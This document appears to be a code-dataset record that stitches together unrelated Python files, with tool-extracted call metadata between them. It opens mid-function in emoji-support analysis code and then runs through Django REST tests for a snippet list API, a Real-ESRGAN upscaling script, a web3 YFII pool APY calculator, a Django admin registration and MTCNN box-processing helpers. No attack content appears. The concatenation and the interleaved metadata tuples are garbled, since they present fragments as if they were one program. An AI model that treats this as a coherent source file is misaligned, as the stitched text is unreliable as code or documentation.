df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| [
"pandas.read_csv",
"emoji.metadata",
"emoji.datafile",
"os.path.splitext",
"os.path.join",
"os.path.isfile",
"os.path.basename",
"pandas.DataFrame",
"os.stat",
"os.walk"
] | [((76, 111), 'emoji.datafile', 'emoji.datafile', (['"""emoji_support.csv"""'], {}), "('emoji_support.csv')\n", (90, 111), False, 'import emoji\n'), ((1107, 1129), 'os.path.splitext', 'os.path.splitext', (['file'], {}), '(file)\n', (1123, 1129), False, 'import os\n'), ((1238, 1258), 'os.walk', 'os.walk', (['"""api_level"""'], {}), "('api_level')\n", (1245, 1258), False, 'import os\n'), ((1507, 1528), 'pandas.DataFrame', 'pd.DataFrame', (['records'], {}), '(records)\n', (1519, 1528), True, 'import pandas as pd\n'), ((1809, 1843), 'os.path.isfile', 'os.path.isfile', (['_SUPPORT_CACHE_CSV'], {}), '(_SUPPORT_CACHE_CSV)\n', (1823, 1843), False, 'import os\n'), ((1919, 1991), 'pandas.read_csv', 'pd.read_csv', (['_SUPPORT_CACHE_CSV'], {'converters': "{'cp_seq': ast.literal_eval}"}), "(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})\n", (1930, 1991), True, 'import pandas as pd\n'), ((1332, 1356), 'os.path.join', 'os.path.join', (['root', 'file'], {}), '(root, file)\n', (1344, 1356), False, 'import os\n'), ((2578, 2594), 'emoji.metadata', 'emoji.metadata', ([], {}), '()\n', (2592, 2594), False, 'import emoji\n'), ((1381, 1403), 'os.path.basename', 'os.path.basename', (['root'], {}), '(root)\n', (1397, 1403), False, 'import os\n'), ((1420, 1438), 'os.stat', 'os.stat', (['full_file'], {}), '(full_file)\n', (1427, 1438), False, 'import os\n')] |
import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
        the LIST_FOREIGN setting is False, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| [
"tests.utils.create_user",
"json.dumps",
"tests.utils.constant",
"django.urls.reverse",
"tests.utils.create_snippet"
] | [((455, 478), 'django.urls.reverse', 'reverse', (['"""snippet-list"""'], {}), "('snippet-list')\n", (462, 478), False, 'from django.urls import reverse\n'), ((927, 948), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {}), "('foo')\n", (941, 948), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((957, 978), 'tests.utils.create_snippet', 'create_snippet', (['"""bar"""'], {}), "('bar')\n", (971, 978), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1411, 1431), 'tests.utils.create_user', 'create_user', (['"""owner"""'], {}), "('owner')\n", (1422, 1431), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1440, 1488), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {'private': '(True)', 'owner': 'owner'}), "('foo', private=True, owner=owner)\n", (1454, 1488), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1895, 1916), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {}), "('foo')\n", (1909, 1916), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1925, 1963), 'tests.utils.create_snippet', 'create_snippet', (['"""bar"""'], {'owner': 'self.user'}), "('bar', owner=self.user)\n", (1939, 1963), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((2126, 2157), 'tests.utils.constant', 'constant', (['"""LIST_FOREIGN"""', '(False)'], {}), "('LIST_FOREIGN', False)\n", (2134, 2157), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((4857, 4874), 'tests.utils.constant', 'constant', (['setting'], {}), '(setting)\n', (4865, 4874), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((751, 769), 'json.dumps', 'json.dumps', (['kwargs'], {}), '(kwargs)\n', (761, 769), False, 'import json\n')] |
import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
        help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus | '
              'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2 | '
              'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| [
"os.path.exists",
"cv2.imwrite",
"realesrgan.RealESRGANer",
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"time.perf_counter",
"os.path.isfile",
"basicsr.archs.rrdbnet_arch.RRDBNet",
"gfpgan.GFPGANer",
"os.path.basename",
"realesrgan.archs.srvgg_arch.SRVGGNetCompact",
"cv2.imread"
] | [((275, 300), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (298, 300), False, 'import argparse\n'), ((3590, 3661), 'os.path.join', 'os.path.join', (['"""experiments/pretrained_models"""', "(args.model_name + '.pth')"], {}), "('experiments/pretrained_models', args.model_name + '.pth')\n", (3602, 3661), False, 'import os\n'), ((3923, 4070), 'realesrgan.RealESRGANer', 'RealESRGANer', ([], {'scale': 'netscale', 'model_path': 'model_path', 'model': 'model', 'tile': 'args.tile', 'tile_pad': 'args.tile_pad', 'pre_pad': 'args.pre_pad', 'half': 'args.half'}), '(scale=netscale, model_path=model_path, model=model, tile=args.\n tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=args.half)\n', (3935, 4070), False, 'from realesrgan import RealESRGANer\n'), ((4504, 4543), 'os.makedirs', 'os.makedirs', (['args.output'], {'exist_ok': '(True)'}), '(args.output, exist_ok=True)\n', (4515, 4543), False, 'import os\n'), ((4552, 4578), 'os.path.isfile', 'os.path.isfile', (['args.input'], {}), '(args.input)\n', (4566, 4578), False, 'import os\n'), ((2267, 2358), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(23)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=\n 32, scale=4)\n', (2274, 2358), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((3673, 3699), 'os.path.isfile', 'os.path.isfile', (['model_path'], {}), '(model_path)\n', (3687, 3699), False, 'import os\n'), ((3722, 3782), 'os.path.join', 'os.path.join', (['"""realesrgan/weights"""', "(args.model_name + '.pth')"], {}), "('realesrgan/weights', args.model_name + '.pth')\n", (3734, 3782), False, 'import os\n'), ((3794, 3820), 'os.path.isfile', 'os.path.isfile', (['model_path'], {}), '(model_path)\n', (3808, 3820), False, 'import os\n'), ((4245, 4452), 'gfpgan.GFPGANer', 'GFPGANer', ([], {'model_path': '"""https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth"""', 'upscale': 'args.outscale', 'arch': '"""clean"""', 'channel_multiplier': '(2)', 'bg_upsampler': 'upsampler'}), "(model_path=\n 'https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth'\n , upscale=args.outscale, arch='clean', channel_multiplier=2,\n bg_upsampler=upsampler)\n", (4253, 4452), False, 'from gfpgan import GFPGANer\n'), ((4744, 4763), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4761, 4763), False, 'import time\n'), ((4858, 4896), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (4868, 4896), False, 'import cv2\n'), ((5266, 5331), 'os.path.join', 'os.path.join', (['args.output', 'f"""{imgname}-{args.suffix}.{extension}"""'], {}), "(args.output, f'{imgname}-{args.suffix}.{extension}')\n", (5278, 5331), False, 'import os\n'), ((5343, 5368), 'os.path.exists', 'os.path.exists', (['save_path'], {}), '(save_path)\n', (5357, 5368), False, 'import os\n'), ((2485, 2574), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(6)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32,\n scale=4)\n', (2492, 2574), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((4810, 4832), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (4826, 4832), False, 'import os\n'), ((5855, 5885), 'cv2.imwrite', 'cv2.imwrite', 
(['save_path', 'output'], {}), '(save_path, output)\n', (5866, 5885), False, 'import cv2\n'), ((2679, 2770), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(23)', 'num_grow_ch': '(32)', 'scale': '(2)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=\n 32, scale=2)\n', (2686, 2770), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((4652, 4681), 'os.path.join', 'os.path.join', (['args.input', '"""*"""'], {}), "(args.input, '*')\n", (4664, 4681), False, 'import os\n'), ((2980, 3081), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_conv': '(16)', 'upscale': '(2)', 'act_type': '"""prelu"""'}), "(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16,\n upscale=2, act_type='prelu')\n", (2995, 3081), False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((3292, 3393), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_conv': '(16)', 'upscale': '(4)', 'act_type': '"""prelu"""'}), "(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16,\n upscale=4, act_type='prelu')\n", (3307, 3393), False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((3437, 3526), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(6)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32,\n scale=4)\n', (3444, 3526), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((5948, 5967), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5965, 5967), False, 'import time\n')] |
from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
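    # Quote 1 YFII in DAI via the Uniswap V2 router along the YFII -> WETH -> DAI path.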
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
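    # Pool 4 stats: weekly-reward-based APY, total staked YFII, and TVL valued in DAI.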
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| [
"web3.HTTPProvider"
] | [((132, 151), 'web3.HTTPProvider', 'HTTPProvider', (['w3url'], {}), '(w3url)\n', (144, 151), False, 'from web3 import Web3, HTTPProvider\n')] |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| [
"django.contrib.admin.site.register"
] | [((114, 156), 'django.contrib.admin.site.register', 'admin.site.register', (['CustomUser', 'UserAdmin'], {}), '(CustomUser, UserAdmin)\n', (133, 156), False, 'from django.contrib import admin\n')] |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
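# pad: clip candidate boxes to the h x w image and return matching source/target index ranges plus a validity mask.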
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
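# rerec: expand every box into a square centred on the original box, using its longer side.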
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| [
"numpy.ones_like",
"collections.OrderedDict",
"numpy.repeat",
"numpy.ones",
"numpy.logical_and",
"cv2.resize",
"numpy.where",
"numpy.fix",
"numpy.sort",
"numpy.array",
"numpy.zeros",
"numpy.expand_dims",
"numpy.maximum"
